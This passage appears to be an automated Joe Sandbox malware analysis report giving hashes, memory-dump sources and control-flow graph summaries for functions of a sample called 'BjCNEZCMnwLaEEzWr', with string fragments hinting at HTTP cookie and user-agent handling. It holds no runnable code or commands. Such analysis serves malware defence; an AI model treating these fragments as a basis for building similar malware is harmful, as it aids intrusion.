• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (function entry at 2b41345; graph rendering omitted)

Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: 006ca92935070087b3e51781ca23028249746b330ef9acacb628a55b8ae5542c
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: 00218E31914216AFDF11DE78C884B5DBBB5AF04704F058255F959BB594DB70A810CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; single block at 2b414de-2b41590, calls 2b43653, 2b40c9c and 2b41345 (6 times)]

Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction ID: 61c70a9494ed1f47b44357f7deea25f8a1c9f9047ae98bc3093b8fce9cdb6375
• Opcode Fuzzy Hash: 2fe8e250536a2cc792e0f46b2e11c914316ba17fdb804fdedba9ee654a488dd4
• Instruction Fuzzy Hash: 22119172404524AEEF03AF64C5C8CAA73ECEF40708B4549AA9D89EF44DFE709154DEE5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; function at 2b43f0d-2b43f77, calls 2b43653, 2b4379f, 2b43f78 and 2b4401b]

Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction ID: 28286c3b24bf8dbfe327efdae5fce7ff4dbc62d4e8e0cf2f7a1cdd47cca444f1
• Opcode Fuzzy Hash: 3c9cd30d46be4e823d3ee55b0dac37f33b61cd8768b05aa00de7007601ee8eb1
• Instruction Fuzzy Hash: B5F01C70598240ABFF403BB09CC9B5D36F9AF40705F5C06D1AAC9AD0D4DF709550AE75
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; function at 2b44674-2b447ec, calls 2b43a1c, 2b43a6e and 2b43673]

Strings
Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction ID: 2cfa0e6135a3bea1cd0a71246f168e574437954a962a14d99c8944f1d1204081
• Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
• Instruction Fuzzy Hash: 894184B6500208BFEF125F65CC84BDEBBBAEF80704F154099EA44AA254DB70D550DF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; function at 2b44675-2b447ec, calls 2b43a1c, 2b43a6e and 2b43673]

Strings
Memory Dump Source
• Source File: 0000002C.00000002.2917716069.0000000002B40000.00000040.00000001.00020000.00000000.sdmp, Offset: 02B40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_2b40000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID: -Age$Cook$User$ie: $nt:
• API String ID: 0-2052191038
• Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction ID: c7108e884a482c4e1609bd50166dcbff1599dadbf38bbaed23f69403cea2667d
• Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
• Instruction Fuzzy Hash: 514174B6500208BFEF125F65CC88FDEBFBAEF80704F1540A9EA44AA254DB74D650DB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; function at 2e2093e-2e20af2, calls 2e20cc4, 2e214bc, 2e23cc0, 2e209d9, 2e23653 and 2e20af3]

Memory Dump Source
• Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction ID: 11c20fb4ef809aca2e07b82b85ba9d3a16434bcba7781fa5fb5457c143d3ab6b
• Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
• Instruction Fuzzy Hash: 6951C2715842649FEF139F20CC85B9937BCAF04744F4401D9BA4AFE0D6DBB09694CE65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; single block at 2e214bc-2e21590, calls 2e214de, 2e20c9c and 2e21345 (6 times)]

Memory Dump Source
• Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction ID: c02eaa029a4605bf7dd9fe6e6b63335bff78f416f52c36445e429f6d15c77f50
• Opcode Fuzzy Hash: c8359f379aab296cf034102068ae67c8d17d9b0a7435fec540ab5f7bd7715324
• Instruction Fuzzy Hash: 832101724046249EDF03AF60C9C9CA673EDEF40704F45456AAD8AEF049FE709258CEE6
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; function at 2e21345-2e213ec, calls 2e20e7c]

Memory Dump Source
• Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: df38b710035ab107180ab5fabf918666e4e51519f8213ed40d1107e97c8c31fa
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: B921AE31944226AFEF219E78C944B9DBBB6AF04304F058215F959BF595D730A904CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Rendered graph omitted; single block at 2e214de-2e21590, calls 2e23653, 2e20c9c and 2e21345 (6 times)]

Memory Dump Source
• Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction ID: 537142da9b7bbe654f42e68328461c40e5dc95652363eacbcbc8767b74ea729b
• Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
• Instruction Fuzzy Hash: 64118F724045249EEF03AF60C5C8CAA73EDEE40704B45596AAD8AEF449FE709258CEE5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 2e23f0d-2e23f29 call 2e23653 call 2e2379f 93 2e23f3b-2e23f66 call 2e23f78 * 3 88->93 94 2e23f2b-2e23f39 call 2e2401b 88->94 107 2e23f71 93->107 102 2e23f76-2e23f77 94->102 107->102 108 2e23f71 call 2e23f78 107->108 108->102
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction ID: 6681177559a651a0f3cf1cce2d0bd403be243871ab58b038698f7d4d225eb30e
                                                                                                                                                                • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction Fuzzy Hash: 78F082705C8260A6FF00BB71AC4969933B96F00305F04A1D0B94BAD0D0CE3885588E71
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 2e24674-2e2468d call 2e23a1c 112 2e2468f-2e24698 call 2e23a6e 109->112 113 2e2469d-2e246cd 109->113 112->113 116 2e246d3-2e246f5 113->116 117 2e247e7-2e247ec 113->117 116->117 119 2e246fb-2e24720 116->119 121 2e24722-2e24737 119->121 122 2e24738-2e2475a 119->122 121->122 124 2e247bf-2e247c9 122->124 125 2e2475c-2e2477e 122->125 126 2e247e0-2e247e5 124->126 127 2e247cb-2e247dd call 2e23673 124->127 125->124 130 2e24780-2e247a2 125->130 126->117 127->126 130->124 133 2e247a4-2e247bc 130->133 133->124
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: c3273d7f151abcf85100dcb4138bf1f163300c2eb8381fbf5e4bb458663fd5fe
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 304162B6600218BFEF129F65CC44BDEBBBAEF80708F154069EA45AA294D734D644CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 2e24675-2e24680 135 2e2468b-2e2468d 134->135 136 2e24686 call 2e23a1c 134->136 137 2e2468f-2e24698 call 2e23a6e 135->137 138 2e2469d-2e246cd 135->138 136->135 137->138 141 2e246d3-2e246f5 138->141 142 2e247e7-2e247ec 138->142 141->142 144 2e246fb-2e24720 141->144 146 2e24722-2e24737 144->146 147 2e24738-2e2475a 144->147 146->147 149 2e247bf-2e247c9 147->149 150 2e2475c-2e2477e 147->150 151 2e247e0-2e247e5 149->151 152 2e247cb-2e247dd call 2e23673 149->152 150->149 155 2e24780-2e247a2 150->155 151->142 152->151 155->149 158 2e247a4-2e247bc 155->158 158->149
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: d2a5899016b24c9aa85d79146bdda4f20699b1245d5bc33acb8208cbe46b3611
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 154184B6600218BFEF125F65CC48BDEBFBAEF80708F154069EA45AA294D734D644CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%